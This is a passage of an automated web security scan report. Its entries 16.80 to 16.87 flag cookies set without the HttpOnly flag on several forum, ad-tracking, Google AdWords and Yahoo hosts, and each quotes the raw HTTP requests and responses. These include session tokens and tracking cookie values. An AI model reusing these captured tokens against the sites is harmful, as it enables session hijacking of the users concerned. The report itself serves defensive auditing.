16.80. http://www.thailandhotelforums.com/forum/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.thailandhotelforums.com
Path:   /forum/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forum/index.php HTTP/1.1
Host: www.thailandhotelforums.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:34:08 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.17 with Suhosin-Patch
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=5jdee9v5utii7ouils1v34hfm1; path=/; domain=.thailandhotelforums.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Tue, 03 May 2011 13:34:08 GMT
Connection: close
Content-Type: text/html; charset=TIS-620
Content-Length: 47754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <meta http-equiv="Content-T
...[SNIP]...

16.81. http://18.xg4ken.com/media/redir.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://18.xg4ken.com
Path:   /media/redir.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/redir.php?prof=134&camp=8206&affcode=kw20564&inhURL=&cid=6850998613&networkType=search&url[]=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B225548374%3B49327377%3Bv%3Fhttps:%2F%2Fwww.ally.com%2Findex.html%3FCP%3Dppc110298/x22 HTTP/1.1
Host: 18.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 13:15:05 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=359781f1-9b59-6608-7ae3-00004ef4f5f9; expires=Mon, 01-Aug-2011 13:15:05 GMT; path=/; domain=.xg4ken.com
Location: http://ad.doubleclick.net/clk;225548374;49327377;v?https://www.ally.com/index.html?CP=ppc110298/x22
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


16.82. http://419.myfunforum.org/sutra724.php/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://419.myfunforum.org
Path:   /sutra724.php/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sutra724.php/x22 HTTP/1.1
Host: 419.myfunforum.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:15:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.16
Set-Cookie: cc=US
Set-Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; expires=Wed, 02-May-2012 13:15:09 GMT; path=/
Set-Cookie: phpbb2mysql_sid=271a141b4d0506677d3717c256a38e75; path=/
Cache-Control: no-cache, pre-check=0, post-check=0
Expires: 0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 30928

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="Content-Style-Type" c
...[SNIP]...

16.83. http://a.unanimis.co.uk/fc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.unanimis.co.uk
Path:   /fc.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fc.php?script=profileTargetingCommon:profileTargetingBeacon&pid=457 HTTP/1.1
Host: a.unanimis.co.uk
Proxy-Connection: keep-alive
Referer: http://www.barclays.co.uk/Loans/P1242557963420
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OXPT=6g8AAB7JAQAAAQAAAAAAAAAAAAAAAAAA4gEAAA%3D%3D; expires=Thu, 02-Jun-2011 10:24:25 GMT; path=/; domain=.unanimis.co.uk
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

16.84. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=590841&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.barclays.co.uk/Loans/P1242557963420
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; bh="b!!!%1!!!?H!!!!%<wR0_!!*oY!!!!#<xqZB!!-?2!!!!*<xqZB!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!$<xqZB!!0O4!!!!(<xt]T!!0O<!!!!-<xt]T!!0P,!!!!#<x4hf!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!?VS!!B1c<xl.o!!J<=!!!!.<xt]T!!J<E!!!!.<xt]T!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<xqZB!!PL`!!!!#<x@jG!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!/<xt]T!!q:E!!!!,<xt]T!!q<+!!!!-<xt]T!!q</!!!!-<xt]T!!q<3!!!!-<xt]T!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!%<xt]T!!tjQ!!!!$<xqZB!!ucq!!!!-<xt]T!!vRm!!!!(<xt]T!!vRq!!!!(<xt]T!!vRr!!!!(<xt]T!!vRw!!!!-<xt]T!!vRx!!!!(<xt]T!!vRy!!!!(<xt]T!!w3l!!!!$<xqZB!!wQ3!!!!$<xqZB!!wQ5!!!!$<xqZB!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!(<xt]T!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!(<xt]U!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!(<xt]T!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(V!!!!#<x31-!#5(W!!!!#<x3.t!#5([!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!(<xt]T!#7.'!!!!(<xt]T!#7.:!!!!(<xt]T!#7.O!!!!(<xt]T!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km.!!!!#<xl.y!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!(<xt]T!#MTF!!!!(<xt]T!#MTH!!!!(<xt]T!#MTI!!!!(<xt]T!#MTJ!!!!(<xt]T!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O>d!!C`.<xrYg!#RY.!!!!'<xt,H!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!.<xt]T!#SF3!!!!.<xt]T!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!(<xt]T!#UDP!!!!.<xt]T!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#ZBw!!!!'<xt,H!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]=P!!!!#<xr]Q!#]@s!!!!%<whqH!#]W%!!!!'<xt,H!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#_0B!!!!#<xE(*!#`S2!!!!$<xqZB!#`U0!!!!#<xqZB!#a'?!!!!#<w>/m!#a=6!!!!#<xqZB!#a=7!!!!#<xqZB!#a=9!!!!#<xqZB!#a=P!!!!#<xqZB!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!(<xt]T!#ai7!!!!(<xt]T!#ai?!!!!(<xt]T!#b.n!!!!#<xE(*!#b:Z!!!!#<x2wq!#b<Z!!!!#<x3.t!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b<m!!!!#<x3.t!#b='!!!!#<x3.t!#b=(!!!!#<x,:<!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b=G!!!!#<x3.t!#b?y!!!!#<xE(*!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c%+!!!!#<xE(*!#c-u!!!!-<w*F]!#c?c!!!!(<xt]T!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#ePa!!!!#<xr]M!#e`Y!!!!#<xr]Q!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG+!!!!#<xqZB!#g,F!!!!#<xr]Q!#gHm!!!!'<xt,H!#g[h!!!!'<xt,H!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#k]4!!!!#<x2wq!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p#H!!!!'<xt,H!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!(<xt]T!#sAb!!!!#<x3XJ!#sAc!!!!#<x3XJ!#sC4!!!!#<x3XJ!#sax!!!!#<xd-C!#tLy!!!!(<xt]T!#tM)!!!!(<xt]T!#tn2!!!!(<xt]T!#uE=!!!!#<x9#K!#uJY!!!!.<xt]T!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!(<xt]T!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!+<xt]T!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!!1!!!!'<xt,H!$!4(!!!!'<xt,H!$!4D!!!!'<xt,H!$!8/!!!!#<xl.y!$!89!!!!'<xt,H!$!8o!!!!'<xt,H!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$#3q!!!!(<x+Z1!$#Fi!!!!'<xt,H!$#G4!!!!'<xt,H!$#M.!!!!'<xt,H!$#R7!!!!(<xt]T!$#T!!!!!'<xt,H!$#T3!!!!'<xt,H!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%c]!!!!'<xt,H!$'/1!!!!#<wx=%!$'Z-!!!!(<xt]T!$(!P!!!!$<xqZB!$(+N!!!!#<wGkB!$(>p!!!!'<xt,H!$(Gt!!!!+<xt]T!$(Qs!!!!'<xt,H!$(V0!!!!$<xj^Z!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!$<xqZB!$*Q<!!!!'<xt,H!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q"; ih="b!!!!>!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 10:24:26 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%2!!!?H!!!!%<wR0_!!*oY!!!!#<xqZB!!-?2!!!!*<xqZB!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!$<xqZB!!0O4!!!!(<xt]T!!0O<!!!!-<xt]T!!0P,!!!!#<x4hf!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!?VS!!B1c<xl.o!!J<=!!!!.<xt]T!!J<E!!!!.<xt]T!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<xqZB!!PL`!!!!#<x@jG!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!/<xt]T!!q:E!!!!,<xt]T!!q<+!!!!-<xt]T!!q</!!!!-<xt]T!!q<3!!!!-<xt]T!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)~~!!tjQ!!!!$<xqZB!!ucq!!!!-<xt]T!!vRm!!!!(<xt]T!!vRq!!!!(<xt]T!!vRr!!!!(<xt]T!!vRw!!!!-<xt]T!!vRx!!!!(<xt]T!!vRy!!!!(<xt]T!!vg)!!!!#<y$?8!!w3l!!!!$<xqZB!!wQ3!!!!$<xqZB!!wQ5!!!!$<xqZB!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!(<xt]T!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!(<xt]U!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!(<xt]T!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(V!!!!#<x31-!#5(W!!!!#<x3.t!#5([!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!(<xt]T!#7.'!!!!(<xt]T!#7.:!!!!(<xt]T!#7.O!!!!(<xt]T!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km.!!!!#<xl.y!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!(<xt]T!#MTF!!!!(<xt]T!#MTH!!!!(<xt]T!#MTI!!!!(<xt]T!#MTJ!!!!(<xt]T!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O>d!!C`.<xrYg!#RY.!!!!'<xt,H!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!.<xt]T!#SF3!!!!.<xt]T!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!(<xt]T!#UDP!!!!.<xt]T!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#ZBw!!!!'<xt,H!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]=P!!!!#<xr]Q!#]@s!!!!%<whqH!#]W%!!!!'<xt,H!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#_0B!!!!#<xE(*!#`S2!!!!$<xqZB!#`U0!!!!#<xqZB!#a'?!!!!#<w>/m!#a=6!!!!#<xqZB!#a=7!!!!#<xqZB!#a=9!!!!#<xqZB!#a=P!!!!#<xqZB!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!(<xt]T!#ai7!!!!(<xt]T!#ai?!!!!(<xt]T!#b.n!!!!#<xE(*!#b:Z!!!!#<x2wq!#b<Z!!!!#<x3.t!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b<m!!!!#<x3.t!#b='!!!!#<x3.t!#b=(!!!!#<x,:<!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b=G!!!!#<x3.t!#b?y!!!!#<xE(*!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c%+!!!!#<xE(*!#c-u!!!!-<w*F]!#c?c!!!!(<xt]T!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#ePa!!!!#<xr]M!#e`Y!!!!#<xr]Q!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG+!!!!#<xqZB!#g,F!!!!#<xr]Q!#gHm!!!!'<xt,H!#g[h!!!!'<xt,H!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#k]4!!!!#<x2wq!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p#H!!!!'<xt,H!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!(<xt]T!#sAb!!!!#<x3XJ!#sAc!!!!#<x3XJ!#sC4!!!!#<x3XJ!#sax!!!!#<xd-C!#tLy!!!!(<xt]T!#tM)!!!!(<xt]T!#tn2!!!!(<xt]T!#uE=!!!!#<x9#K!#uJY!!!!.<xt]T!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!(<xt]T!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!+<xt]T!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!!1!!!!'<xt,H!$!4(!!!!'<xt,H!$!4D!!!!'<xt,H!$!8/!!!!#<xl.y!$!89!!!!'<xt,H!$!8o!!!!'<xt,H!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$#3q!!!!(<x+Z1!$#Fi!!!!'<xt,H!$#G4!!!!'<xt,H!$#M.!!!!'<xt,H!$#R7!!!!(<xt]T!$#T!!!!!'<xt,H!$#T3!!!!'<xt,H!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%c]!!!!'<xt,H!$'/1!!!!#<wx=%!$'Z-!!!!(<xt]T!$(!P!!!!$<xqZB!$(+N!!!!#<wGkB!$(>p!!!!'<xt,H!$(Gt!!!!+<xt]T!$(Qs!!!!'<xt,H!$(V0!!!!$<xj^Z!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!$<xqZB!$*Q<!!!!'<xt,H!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q"; path=/; expires=Thu, 02-May-2013 10:24:26 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://ad.yieldmanager.com/pixel?id=914124&t=2
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 10:24:26 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close


16.85. https://adwords.google.com/select/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /select/Login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /select/Login?sourceid=awo&subid=us-en-et-symh&medium=link&hl=en HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: AdsUserLocale=en_US; Expires=Thu, 02-Jun-2011 13:14:26 GMT; Path=/; Secure
Set-Cookie: adwordsReferralSource=sourceid=awo&subid=us-en-et-symh&clickid=; Expires=Mon, 01-Aug-2011 13:14:26 GMT; Path=/; Secure; HttpOnly
Set-Cookie: I=RUcati8BAAA.9QCH_JbBItRG1yn60m2UCA.Isp66PvUzH2i3uEOFrszdQ; Path=/select; Secure; HttpOnly
Set-Cookie: S=awfe=jAPmJRMK64NVZhX6luBySw:awfe-efe=jAPmJRMK64NVZhX6luBySw; Domain=.google.com; Path=/; Secure; HttpOnly
Set-Cookie: S_awfe=2wrS4bN4d0h0sY0KJ-uZtg; Domain=.google.com; Path=/; Secure; HttpOnly
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Location: /um/StartNewLogin?sourceid=awo&subid=us-en-et-symh&medium=link&hl=en
Date: Tue, 03 May 2011 13:14:26 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="/um/StartNewLogin?sourceid=awo&amp;subid=us-en
...[SNIP]...

16.86. https://adwords.google.com/um/StartNewLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /um/StartNewLogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: AdsUserLocale=en; Path=/; Secure
Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: S=adwords-usermgmt=b5tRlrAlRr3-k4iuyw0__w; Domain=.google.com; Path=/; Secure; HttpOnly
Location: https://www.google.com/accounts/ServiceLogin?service=adwords&hl=en&ltmpl=adwords&passive=true&ifr=false&alwf=true&continue=https://adwords.google.com/um/gaiaauth?apt%3DNone
X-Invoke-Duration: 20
Content-Type: text/html; charset=UTF-8
Date: Tue, 03 May 2011 13:14:26 GMT
Expires: Tue, 03 May 2011 13:14:26 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?s
...[SNIP]...

16.87. http://answers.yahoo.com/dir/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://answers.yahoo.com
Path:   /dir/index

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dir/index HTTP/1.1
Host: answers.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

